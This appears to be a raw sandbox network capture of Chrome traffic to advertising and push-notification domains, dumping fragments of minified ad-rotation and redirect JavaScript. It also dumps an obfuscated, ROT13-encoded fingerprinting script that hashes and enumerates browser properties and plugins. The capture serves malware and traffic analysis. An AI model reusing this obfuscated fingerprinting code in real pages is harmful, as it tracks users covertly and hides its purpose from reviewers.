                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 3d 6c 6e 26 26 6c 6e 2c 69 73 41 6e 61 6c 79 74 69 63 73 45 6e 61 62 6c 65 3a 4b 2c 69 70 70 5a 6f 6e 65 73 45 78 69 73 74 3a 21 21 28 6e 75 6c 6c 3d 3d 3d 47 7c 7c 76 6f 69 64 20 30 3d 3d 3d 47 3f 76 6f 69 64 20 30 3a 47 2e 6c 65 6e 67 74 68 29 2c 73 68 6f 75 6c 64 52 65 64 69 72 65 63 74 4f 6e 6c 79 57 68 65 6e 55 73 65 72 41 63 74 69 76 65 3a 6e 75 6c 6c 21 3d 3d 28 64 6e 3d 6e 75 6c 6c 3d 3d 3d 46 7c 7c 76 6f 69 64 20 30 3d 3d 3d 46 7c 7c 6e 75 6c 6c 3d 3d 3d 28 72 3d 46 2e 6e 6f 6e 55 6e 69 71 75 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 73 68 6f 75 6c 64 52 65 64 69 72 65 63 74 4f 6e 6c 79 57 68 65 6e 55 73 65 72 41 63 74 69 76 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 64 6e 26 26 64 6e 2c 69 73 56 69 67 6e 65 74 74 65 45
                                                                                                          Data Ascii: =ln&&ln,isAnalyticsEnable:K,ippZonesExist:!!(null===G||void 0===G?void 0:G.length),shouldRedirectOnlyWhenUserActive:null!==(dn=null===F||void 0===F||null===(r=F.nonUnique)||void 0===r?void 0:r.shouldRedirectOnlyWhenUserActive)&&void 0!==dn&&dn,isVignetteE
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 5a 29 28 41 2c 7b 7a 6f 6e 65 44 65 74 61 69 6c 73 3a 6f 6e 2e 7a 6f 6e 65 73 44 65 74 61 69 6c 73 2c 7a 6f 6e 65 4f 70 74 69 6f 6e 73 3a 6e 75 6c 6c 3d 3d 3d 46 7c 7c 76 6f 69 64 20 30 3d 3d 3d 46 3f 76 6f 69 64 20 30 3a 46 2e 70 75 73 68 2c 69 73 41 6e 61 6c 79 74 69 63 73 45 6e 61 62 6c 65 3a 4b 2c 64 6f 50 75 73 68 44 6f 6d 61 69 6e 73 3a 6e 6e 7d 29 2c 56 26 26 43 3c 3d 28 6e 75 6c 6c 3d 3d 3d 56 7c 7c 76 6f 69 64 20 30 3d 3d 3d 56 3f 76 6f 69 64 20 30 3a 56 2e 63 68 61 6e 63 65 4f 66 52 65 63 6f 72 64 69 6e 67 29 26 26 28 6e 75 6c 6c 3d 3d 3d 56 7c 7c 76 6f 69 64 20 30 3d 3d 3d 56 3f 76 6f 69 64 20 30 3a 56 2e 69 73 45 6e 61 62 6c 65 64 29 26 26 21 75 2e 6e 2e 66 75 6c 6c 5f 73 74 6f 72 79 26 26 28 30 2c 69 2e 74 5a 29 28 55 2c 7b 7d 29 2c 61 6e 26
                                                                                                          Data Ascii: Z)(A,{zoneDetails:on.zonesDetails,zoneOptions:null===F||void 0===F?void 0:F.push,isAnalyticsEnable:K,doPushDomains:nn}),V&&C<=(null===V||void 0===V?void 0:V.chanceOfRecording)&&(null===V||void 0===V?void 0:V.isEnabled)&&!u.n.full_story&&(0,i.tZ)(U,{}),an&
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 73 65 6c 66 21 3d 3d 77 69 6e 64 6f 77 2e 74 6f 70 2c 69 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 33 32 30 3b 6e 3f 28 72 28 7b 74 79 70 65 3a 4f 2e 4b 2e 73 65 74 49 66 72 61 6d 65 2c 70 61 79 6c 6f 61 64 3a 7b 69 73 45 6e 61 62 6c 65 64 3a 65 2c 69 73 49 66 72 61 6d 65 3a 21 30 2c 69 73 53 6d 61 6c 6c 57 69 6e 64 6f 77 3a 69 2c 6f 6e 63 6c 69 63 6b 5a 6f 6e 65 3a 6e 75 6c 6c 21 3d 3d 74 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 6e 75 6c 6c 7d 7d 29 2c 28 30 2c 64 2e 63 4d 29 28 22 49 66 72 61 6d 65 20 64 65 74 65 63 74 65 64 22 29 29 3a 28 30 2c 64 2e 63 4d 29 28 22 49 66 72 61 6d 65 20 6e 6f 74 20 64 65 74 65 63 74 65 64 22 29 7d 3b 72 65 74 75 72
                                                                                                          Data Ascii: ar n=function(){var n=window.self!==window.top,i=window.innerWidth<320;n?(r({type:O.K.setIframe,payload:{isEnabled:e,isIframe:!0,isSmallWindow:i,onclickZone:null!==t&&void 0!==t?t:null}}),(0,d.cM)("Iframe detected")):(0,d.cM)("Iframe not detected")};retur
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 6d 69 73 73 69 6f 6e 54 69 6d 65 72 2c 68 3d 6c 2e 69 66 72 61 6d 65 2c 77 3d 6c 2e 70 72 6f 78 79 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 74 3d 21 28 6e 75 6c 6c 3d 3d 3d 6c 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 69 73 46 72 61 75 64 50 72 65 76 65 6e 74 69 6f 6e 45 6e 61 62 6c 65 64 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 7c 7c 75 2e 6e 2e 70 72 65 76 69 65 77 3f 28 30 2c 69 2e 74 5a 29 28 69 2e 48 59 2c 7b 63 68 69 6c 64 72 65 6e 3a 73 7d 29 3a 28 30 2c 69 2e 42 58 29 28 69 2e 48 59 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 73 2c 28 6e 75 6c 6c 3d 3d 3d 67 7c 7c 76 6f 69 64 20 30 3d 3d 3d 67 3f 76 6f 69 64 20 30 3a 67 2e 69 73 45 6e 61 62 6c 65 64 29 26 26 28 6e 75 6c 6c 3d 3d 3d 67 7c 7c 76 6f 69 64 20 30 3d 3d
                                                                                                          Data Ascii: missionTimer,h=l.iframe,w=l.proxy;return null===(t=!(null===l||void 0===l?void 0:l.isFraudPreventionEnabled))||void 0===t||t||u.n.preview?(0,i.tZ)(i.HY,{children:s}):(0,i.BX)(i.HY,{children:[s,(null===g||void 0===g?void 0:g.isEnabled)&&(null===g||void 0==
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 29 2c 28 30 2c 64 2e 63 4d 29 28 22 44 69 73 70 61 74 63 68 65 64 20 6e 6f 74 69 66 69 63 61 74 69 6f 6e 20 73 74 61 74 75 73 20 74 6f 20 73 74 6f 72 65 22 2c 74 29 7d 3b 72 65 74 75 72 6e 28 30 2c 64 2e 63 4d 29 28 22 41 64 64 69 6e 67 20 65 76 65 6e 74 20 6c 69 73 74 65 6e 65 72 20 66 6f 72 20 70 75 73 68 5f 6f 6e 6c 6f 61 64 5f 72 65 61 64 79 22 29 2c 77 69 6e 64 6f 77 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 53 74 61 74 75 73 52 65 61 64 79 26 26 77 69 6e 64 6f 77 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 53 74 61 74 75 73 52 65 73 75 6c 74 26 26 77 69 6e 64 6f 77 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 53 74 61 74 75 73 52 65 73 75 6c 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 28 7b 73 74 61 74 75 73 3a 6e
                                                                                                          Data Ascii: ),(0,d.cM)("Dispatched notification status to store",t)};return(0,d.cM)("Adding event listener for push_onload_ready"),window.notificationStatusReady&&window.notificationStatusResult&&window.notificationStatusResult.forEach((function(n){return e({status:n
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 70 22 3a 22 6f 6e 63 6c 69 63 6b 22 2c 6f 61 69 64 3a 69 2e 6f 61 69 64 2c 6f 73 56 65 72 73 69 6f 6e 3a 74 2c 73 75 62 49 64 3a 69 2e 75 73 65 72 44 61 74 61 2e 73 75 62 49 64 2c 70 61 73 73 50 61 72 61 6d 54 6f 50 61 72 61 6d 73 3a 65 7d 29 3b 68 2e 70 75 73 68 28 7b 7a 6f 6e 65 4e 61 6d 65 3a 75 2c 75 72 6c 3a 66 2c 74 61 62 3a 73 2c 77 65 69 67 68 74 3a 72 7d 29 7d 65 6c 73 65 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 2f 72 6f 74 61 74 65 3a 5c 6e 22 2c 22 41 64 20 61 74 20 69 6e 64 65 78 20 22 2e 63 6f 6e 63 61 74 28 6f 29 2c 22 5c 6e 22 2c 22 5a 6f 6e 65 4e 61 6d 65 3a 20 22 2e 63 6f 6e 63 61 74 28 75 29 2c 22 5c 6e 22 2c 22 54 61 62 3a 20 22 2e 63 6f 6e 63 61 74 28 73 29 2c 22 5c 6e 22 2c 22 48 61 73 20 6e 6f 20 63 6c 69 63 6b 20 55 52 4c 2e
                                                                                                          Data Ascii: p":"onclick",oaid:i.oaid,osVersion:t,subId:i.userData.subId,passParamToParams:e});h.push({zoneName:u,url:f,tab:s,weight:r})}else console.error("/rotate:\n","Ad at index ".concat(o),"\n","ZoneName: ".concat(u),"\n","Tab: ".concat(s),"\n","Has no click URL.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          59192.168.2.450106188.114.97.34438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC488OUTGET /stattag.js HTTP/1.1
                                                                                                          Host: cdntechone.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:23 UTC1039INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Content-Length: 16490
                                                                                                          Connection: close
                                                                                                          Last-Modified: Thu, 11 Jul 2024 10:23:50 GMT
                                                                                                          ETag: "668fb2b6-406a"
                                                                                                          Link: <https://datatechone.com/>; rel=preconnect; crossorigin, <https://datatechonert.com/>; rel=preconnect; crossorigin
                                                                                                          Cache-Control: max-age=14400
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1291
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qf%2BAvfHBPiMkYnkQfyx%2BFLO%2FNw5LsW13cWf9mYZP5jvIGJAS9DBEt1cA1drjv9zkpt%2FntMfmmZgBJ4wRPSLfahhkKUqrW%2BwFJGI4zKz%2FMb5MLj62mtQ0d5VReQtZF2iDgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416b49458c7d-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1787&rtt_var=672&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1066&delivery_rate=1627647&cwnd=239&unsent_bytes=0&cid=8ce9e6126b09b3f8&ts=145&x=0"
                                                                                                          2025-01-06 11:09:23 UTC330INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 5f 64 73 33 64 63 76 5f 5f 2e 6d 6d 68 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 24 29 7b 66 6f 72 28 76 61 72 20 78 2c 5f 3d 66 2e 6c 65 6e 67 74 68 2c 65 3d 24 5e 5f 2c 64 3d 30 3b 5f 3e 3d 34 3b 29 78 3d 28 36 35 35 33 35 26 28 78 3d 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 64 29 7c 28 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 64 29 29 3c 3c 38 7c 28 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 64 29 29 3c 3c 31 36 7c 28 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 64 29 29 3c 3c 32 34 29 29 2a 31 35 34 30 34 38 33 34 37 37 2b 28 28 28 78 3e 3e 3e 31 36 29 2a 31 35 34 30 34 38 33 34 37 37 26 36 35 35 33 35 29 3c 3c 31 36 29 2c 78 5e 3d 78 3e 3e 3e 32
                                                                                                          Data Ascii: !function(){window.__ds3dcv__.mmh=function(f,$){for(var x,_=f.length,e=$^_,d=0;_>=4;)x=(65535&(x=255&f.charCodeAt(d)|(255&f.charCodeAt(++d))<<8|(255&f.charCodeAt(++d))<<16|(255&f.charCodeAt(++d))<<24))*1540483477+(((x>>>16)*1540483477&65535)<<16),x^=x>>>2
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 30 34 38 33 34 37 37 2b 28 28 28 78 3e 3e 3e 31 36 29 2a 31 35 34 30 34 38 33 34 37 37 26 36 35 35 33 35 29 3c 3c 31 36 29 29 2c 5f 2d 3d 34 2c 2b 2b 64 3b 73 77 69 74 63 68 28 5f 29 7b 63 61 73 65 20 33 3a 65 5e 3d 28 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 64 2b 32 29 29 3c 3c 31 36 3b 63 61 73 65 20 32 3a 65 5e 3d 28 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 64 2b 31 29 29 3c 3c 38 3b 63 61 73 65 20 31 3a 65 5e 3d 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 64 29 2c 65 3d 28 36 35 35 33 35 26 65 29 2a 31 35 34 30 34 38 33 34 37 37 2b 28 28 28 65 3e 3e 3e 31 36 29 2a 31 35 34 30 34 38 33 34 37 37 26 36 35 35 33 35 29 3c 3c 31 36 29 7d 72 65 74 75 72 6e 20 65 5e 3d 65 3e 3e 3e 31 33 2c 65 3d 28 36 35 35 33 35 26 65 29 2a 31 35
                                                                                                          Data Ascii: 0483477+(((x>>>16)*1540483477&65535)<<16)),_-=4,++d;switch(_){case 3:e^=(255&f.charCodeAt(d+2))<<16;case 2:e^=(255&f.charCodeAt(d+1))<<8;case 1:e^=255&f.charCodeAt(d),e=(65535&e)*1540483477+(((e>>>16)*1540483477&65535)<<16)}return e^=e>>>13,e=(65535&e)*15
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 66 28 45 2e 75 21 3d 3d 28 69 3d 61 28 74 5b 75 5d 29 29 29 7b 6f 5b 65 5d 3d 69 3b 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 20 6f 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 5b 45 2e 50 5d 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 69 2c 6f 2c 72 29 7b 76 61 72 20 61 2c 64 3d 45 2e 72 3d 3d 3d 45 2e 72 5b 45 2e 4d 67 5d 28 29 2c 63 3d 6f 5b 45 2e 78 5d 7c 7c 45 2e 67 28 29 2c 75 3d 64 3f 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 3d 45 2e 48 54 3b 45 2e 4f 64 21 3d 74 79 70 65 6f 66 20 6e 26 26 28 6e 3d 4a 53 4f 4e 5b 45 2e 5a 67 5d 28 6e 29 29 3b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 69 3d 45 2e 7a 3b 69 3c 6e 5b 45 2e 6f 5d 3b 69 2b 2b 29 7b 76 61 72 20 6f 3d 6e 5b 45 2e 72 59 5d 28 69 29 5e 65 5b 69 25 65 5b 45
                                                                                                          Data Ascii: f(E.u!==(i=a(t[u]))){o[e]=i;break}}return o},c=function(){return T[E.P]},u=function(n,e,i,o,r){var a,d=E.r===E.r[E.Mg](),c=o[E.x]||E.g(),u=d?function(n){var e=E.HT;E.Od!=typeof n&&(n=JSON[E.Zg](n));for(var t=[],i=E.z;i<n[E.o];i++){var o=n[E.rY](i)^e[i%e[E
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 29 2c 69 29 72 65 74 75 72 6e 20 6f 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 5b 5d 3b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 74 3d 45 2e 7a 3b 74 3c 6e 5b 45 2e 6f 5d 3b 74 2b 2b 29 65 5b 45 2e 45 5d 28 6c 28 45 2e 67 28 29 2c 6e 5b 74 5d 2c 21 45 2e 7a 29 29 3b 72 65 74 75 72 6e 20 65 7d 2c 67 3d 5b 5d 3b 67 5b 45 2e 45 5d 28 45 2e 67 28 45 2e 7a 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 5b 45 2e 4a 45 5d 3d 45 2e 76 45 2c 6e 5b 45 2e 43 45 5d 3d 45 2e 76 45 2c 6e 5b 45 2e 6c 45 5d 3d 2d 45 2e 71 3b 76 61 72 20 65 3d 4b 5b 45 2e 73 45 5d 28 45 2e 68 45 29 2c 74 3d 45 2e 67 28 45 2e 49 45 2c 21 45 2e 59 2c 45 2e 4c 45 2c 21 45 2e 59 2c 45 2e 78 45 2c 21 45 2e 59 2c 45 2e 6a 45 2c 21 45 2e 59 2c 45 2e 61 45 2c 21
                                                                                                          Data Ascii: ),i)return o},f=function(n){if(!n)return[];for(var e=[],t=E.z;t<n[E.o];t++)e[E.E](l(E.g(),n[t],!E.z));return e},g=[];g[E.E](E.g(E.z,function(n){n[E.JE]=E.vE,n[E.CE]=E.vE,n[E.lE]=-E.q;var e=K[E.sE](E.hE),t=E.g(E.IE,!E.Y,E.LE,!E.Y,E.xE,!E.Y,E.jE,!E.Y,E.aE,!
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 6e 20 6e 5b 45 2e 47 64 5d 3d 59 5b 45 2e 58 64 5d 2c 6e 7d 2c 45 2e 57 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 21 28 45 2e 64 45 20 69 6e 20 54 29 29 72 65 74 75 72 6e 20 6e 5b 45 2e 55 64 5d 3d 45 2e 75 2c 6e 5b 45 2e 63 64 5d 3d 45 2e 75 2c 6e 3b 66 6f 72 28 76 61 72 20 65 3d 59 5b 45 2e 44 54 5d 7c 7c 5b 5d 2c 74 3d 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 50 6c 75 67 69 6e 41 72 72 61 79 26 26 45 2e 7a 21 3d 3d 65 5b 45 2e 6f 5d 3f 45 2e 59 3a 45 2e 7a 2c 69 3d 45 2e 4c 2c 6f 3d 45 2e 7a 3b 6f 3c 65 5b 45 2e 6f 5d 3b 6f 2b 2b 29 69 3d 69 2b 65 5b 6f 5d 5b 45 2e 6d 4b 5d 2b 45 2e 66 54 2b 28 65 5b 6f 5d 69 6e 73 74 61 6e 63 65 6f 66 20 50 6c 75 67 69 6e 3f 45 2e 51 54 3a 45 2e 47 54 29 2b 45 2e 70 45 3b 72 65 74 75 72 6e 20 6e 5b 45 2e 55 64 5d
                                                                                                          Data Ascii: n n[E.Gd]=Y[E.Xd],n},E.W,function(n){if(!(E.dE in T))return n[E.Ud]=E.u,n[E.cd]=E.u,n;for(var e=Y[E.DT]||[],t=e instanceof PluginArray&&E.z!==e[E.o]?E.Y:E.z,i=E.L,o=E.z;o<e[E.o];o++)i=i+e[o][E.mK]+E.fT+(e[o]instanceof Plugin?E.QT:E.GT)+E.pE;return n[E.Ud]
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 75 72 6e 20 6e 5b 45 2e 43 64 5d 3d 76 6f 69 64 20 45 2e 7a 21 3d 3d 4b 5b 45 2e 43 64 5d 3f 4b 5b 45 2e 43 64 5d 3a 45 2e 75 2c 6e 7d 2c 45 2e 58 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 5b 45 2e 6c 64 5d 3d 4f 62 6a 65 63 74 5b 45 2e 75 67 5d 28 54 29 5b 45 2e 6b 54 5d 28 45 2e 59 45 29 2c 6e 7d 2c 45 2e 55 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 5b 45 2e 73 64 5d 3d 4f 62 6a 65 63 74 5b 45 2e 75 67 5d 28 54 29 5b 45 2e 6f 5d 2c 6e 7d 2c 45 2e 63 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 5b 45 2e 68 64 5d 3d 76 6f 69 64 20 45 2e 7a 21 3d 3d 54 5b 45 2e 79 54 5d 26 26 76 6f 69 64 20 45 2e 7a 21 3d 3d 54 5b 45 2e 79 54 5d 5b 45 2e 77 54 5d 3f 54 5b 45 2e 79 54 5d 5b 45 2e 77 54 5d 3a 45 2e
                                                                                                          Data Ascii: urn n[E.Cd]=void E.z!==K[E.Cd]?K[E.Cd]:E.u,n},E.X,function(n){return n[E.ld]=Object[E.ug](T)[E.kT](E.YE),n},E.U,function(n){return n[E.sd]=Object[E.ug](T)[E.o],n},E.c,function(n){return n[E.hd]=void E.z!==T[E.yT]&&void E.z!==T[E.yT][E.wT]?T[E.yT][E.wT]:E.
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 62 4b 5d 3d 74 5b 45 2e 62 4b 5d 2c 65 5b 45 2e 42 4b 5d 3d 74 5b 45 2e 42 4b 5d 2c 65 5b 45 2e 6e 4b 5d 3d 74 5b 45 2e 6e 4b 5d 2c 65 5b 45 2e 6b 4b 5d 3d 74 5b 45 2e 6b 4b 5d 2c 65 5b 45 2e 77 4b 5d 3d 74 5b 45 2e 77 4b 5d 2c 6e 5b 45 2e 44 45 5d 3d 65 7d 65 6c 73 65 20 6e 5b 45 2e 44 45 5d 3d 45 2e 67 28 29 3b 72 65 74 75 72 6e 20 6e 7d 29 29 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 65 3d 45 2e 7a 2c 74 3d 45 2e 7a 3b 74 3c 6e 5b 45 2e 6f 5d 3b 74 2b 2b 29 6e 5b 74 5d 26 26 28 65 2b 3d 45 2e 59 29 3b 72 65 74 75 72 6e 20 65 7d 2c 67 5b 45 2e 45 5d 28 45 2e 67 28 45 2e 7a 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 65 28 5b 45 2e 4f 4b 20 69 6e 20 54 2c 45 2e 4d 4b 20 69 6e 20 54 2c 45 2e 5a 4b 20 69 6e 20 54 2c
                                                                                                          Data Ascii: bK]=t[E.bK],e[E.BK]=t[E.BK],e[E.nK]=t[E.nK],e[E.kK]=t[E.kK],e[E.wK]=t[E.wK],n[E.DE]=e}else n[E.DE]=E.g();return n})),e=function(n){for(var e=E.z,t=E.z;t<n[E.o];t++)n[t]&&(e+=E.Y);return e},g[E.E](E.g(E.z,function(n){var t=e([E.OK in T,E.MK in T,E.ZK in T,
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 75 72 6e 5b 6e 28 54 5b 45 2e 75 7a 5d 29 2c 6e 28 4b 29 2c 6e 28 59 29 2c 6e 28 4b 5b 45 2e 52 54 5d 5b 45 2e 70 59 5d 29 5d 5b 45 2e 6f 54 5d 28 45 2e 4c 29 7d 28 29 2c 45 2e 4c 54 29 5b 45 2e 59 54 5d 28 29 29 7d 29 29 3b 76 61 72 20 6d 3d 5b 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 54 5b 45 2e 68 5d 5b 45 2e 43 5d 28 6e 29 7d 5d 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 29 7b 45 2e 4f 64 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 45 2e 53 54 28 65 2c 45 2e 4c 67 29 29 2c 65 3d 45 2e 53 54 28 65 29 3b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 69 3d 5b 5d 3b 45 2e 75 21 3d 3d 28 74 3d 65 5b 45 2e 49 5d 28 6e 29 29 3b 29 69 5b 45 2e 45 5d 28 74 29 3b 72 65 74 75 72 6e 20 69 7d 28
                                                                                                          Data Ascii: urn[n(T[E.uz]),n(K),n(Y),n(K[E.RT][E.pY])][E.oT](E.L)}(),E.LT)[E.YT]())}));var m=[function(n){T[E.h][E.C](n)}],v=function(n){for(var e=n,t=function(n,e){E.Od==typeof e&&(e=E.ST(e,E.Lg)),e=E.ST(e);for(var t=[],i=[];E.u!==(t=e[E.I](n));)i[E.E](t);return i}(
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 2e 45 5d 28 72 5b 45 2e 4e 59 5d 29 3b 76 61 72 20 74 3d 72 5b 45 2e 75 45 5d 3f 72 5b 45 2e 75 45 5d 3a 5b 5d 3b 69 66 28 74 26 26 74 5b 45 2e 6f 5d 29 66 6f 72 28 76 61 72 20 69 3d 45 2e 7a 3b 69 3c 72 5b 45 2e 75 45 5d 5b 45 2e 6f 5d 3b 69 2b 2b 29 7b 76 61 72 20 6f 3d 72 5b 45 2e 75 45 5d 5b 69 5d 3b 6f 26 26 6f 5b 45 2e 4e 59 5d 26 26 6f 5b 45 2e 4e 59 5d 5b 45 2e 46 59 5d 26 26 63 5b 45 2e 45 5d 28 6f 5b 45 2e 4e 59 5d 29 7d 66 6f 72 28 69 3d 45 2e 7a 3b 69 3c 63 5b 45 2e 6f 5d 3b 69 2b 2b 29 7b 76 61 72 20 61 3d 63 5b 69 5d 3b 74 72 79 7b 61 5b 45 2e 46 59 5d 28 45 2e 75 2c 5b 6e 2c 65 5d 29 7d 63 61 74 63 68 28 6e 29 7b 7d 7d 7d 29 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e
                                                                                                          Data Ascii: .E](r[E.NY]);var t=r[E.uE]?r[E.uE]:[];if(t&&t[E.o])for(var i=E.z;i<r[E.uE][E.o];i++){var o=r[E.uE][i];o&&o[E.NY]&&o[E.NY][E.FY]&&c[E.E](o[E.NY])}for(i=E.z;i<c[E.o];i++){var a=c[i];try{a[E.FY](E.u,[n,e])}catch(n){}}}),v=function(n){var e=function(n){return
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 63 79 6e 70 72 27 2c 6c 3a 27 5c 5c 24 26 27 2c 73 3a 27 5b 3f 26 5d 27 2c 68 3a 27 79 62 70 6e 67 76 62 61 27 2c 49 3a 27 72 6b 72 70 27 2c 4c 3a 27 27 2c 78 3a 27 75 72 6e 71 72 65 66 27 2c 6a 3a 27 26 65 68 76 71 3d 27 2c 61 3a 27 65 5f 68 76 71 27 2c 75 67 3a 27 78 72 6c 66 27 2c 67 67 3a 27 67 65 6e 73 73 76 70 5f 66 62 68 65 70 72 5f 76 71 27 2c 45 67 3a 27 70 79 76 72 61 67 5f 76 71 27 2c 64 67 3a 27 68 61 78 61 62 6a 61 27 2c 54 67 3a 27 6e 73 73 76 79 76 6e 67 72 5f 76 71 27 2c 4b 67 3a 27 6e 71 69 72 65 67 76 66 72 65 5f 76 71 27 2c 59 67 3a 27 70 6e 7a 63 6e 76 74 61 5f 76 71 27 2c 7a 67 3a 27 70 68 66 67 62 7a 5f 76 71 5f 31 27 2c 71 67 3a 27 70 68 66 67 62 7a 5f 76 71 5f 32 27 2c 53 67 3a 27 70 79 76 70 78 5f 76 71 27 2c 6d 67 3a 27 70 62 66
                                                                                                          Data Ascii: cynpr',l:'\\$&',s:'[?&]',h:'ybpngvba',I:'rkrp',L:'',x:'urnqref',j:'&ehvq=',a:'e_hvq',ug:'xrlf',gg:'genssvp_fbhepr_vq',Eg:'pyvrag_vq',dg:'haxabja',Tg:'nssvyvngr_vq',Kg:'nqiregvfre_vq',Yg:'pnzcnvta_vq',zg:'phfgbz_vq_1',qg:'phfgbz_vq_2',Sg:'pyvpx_vq',mg:'pbf


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          60192.168.2.450107104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC671OUTGET /_next/static/media/icon-survey.86b78ce0.svg HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
